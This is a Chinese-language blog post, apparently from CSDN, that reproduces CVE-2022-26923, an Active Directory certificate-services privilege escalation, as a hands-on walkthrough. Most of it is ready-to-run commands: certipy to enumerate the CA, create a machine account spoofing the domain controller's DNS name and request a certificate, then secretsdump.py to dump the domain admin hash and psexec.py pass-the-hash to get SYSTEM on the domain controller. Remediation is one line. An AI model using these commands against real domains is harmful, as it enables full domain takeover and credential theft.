cve-2022-26923漏洞复现+实战+踩坑记录

一、描述

cve-2022-26923域内权限提升漏洞,5月份以前的存在证书服务器的通杀域控管理员权限,危害巨大。
#域控漏洞 #域控证书漏洞

二、利用条件

一个域内普通账号

存在证书服务器

能访问域控和证书服务器那几个端口

三、利用过程(超级重码,步骤有疑问去看原文)

当前有一个域账号,攻击机为自己电脑(挂好代理可访问内网):

1.certipy查找证书服务器主机名和ip

certipy find "XXXXX.com.cn/username:password@域控ip" -debug

cve-2022-26923漏洞复现+实战+踩坑记录_第1张图片

2.修改攻击机hosts

C:\Windows\System32\drivers\etc\hosts

dc的ip dc的域名
ca的ip ca的域名

3.certipy利用域账号创建个机器账号(这个机器账号属性dnsHostName和域控的主机名一样,这也是漏洞点所在):

certipy account create "XXXXX.com.cn/username:password@域控ip" -dc-ip  域控ip -user "随便起一个机器名(如:machinetestcymm)" -dns "域控的主机名(假设为DC.com.cn)" -debug

cve-2022-26923漏洞复现+实战+踩坑记录_第2张图片

4.certipy使用该机器账号请求一个证书(漏洞成因:因为机器账号dnsHostName属性和域控一样,被误认为是域控权限)

certipy req -dc-ip 域控ip "XXXX.com.cn/机器账名$:机器账号密码@域控ip" -ca CA主机名(步骤1查到的(不带.com.cn这种后缀)) -template Machine -debug

cve-2022-26923漏洞复现+实战+踩坑记录_第3张图片

5.certipy用证书请求域控机器账号HASH

cve-2022-26923漏洞复现+实战+踩坑记录_第4张图片

6.secretsdump.py使用域控机器账号hash获得域管理员账户的hash

python secretsdump.py -hashes 域控机器账户hash:域控机器账户hash  "XXXX.com.cn/域控机器账号(不带.com.cn)$@域控ip"  -just-dc-user 域管理账户名(dcadministrator)

cve-2022-26923漏洞复现+实战+踩坑记录_第5张图片

7.psexec.py进行pth,获得域控system权限:

python3 psexec.py -hashes :域管hash 域管账户名@域控ip -dc-ip 域控ip

cve-2022-26923漏洞复现+实战+踩坑记录_第6张图片

到这里就结束了,
过程中用到的域渗透的基础技术不是本次漏洞重点,就省略了,相信熟悉域渗透的同学都能明白(比如XXXX.com.cn一看就是域的域名,域控ip如何查询),下面是针对不同技术人员的解释,东西太多csdn不支持图片导入,原文都在我的公众号里https://mp.weixin.qq.com/s/3DZPkG4Z9w8xbVKvW64Mgw
三、详情,以及某些涉及的基础域知识
四、踩坑报错排查
五、漏洞修复
请尽快更新微软发布的域控补丁包
cve-2022-26923漏洞复现+实战+踩坑记录_第7张图片

你可能感兴趣的:(安全,https,web安全)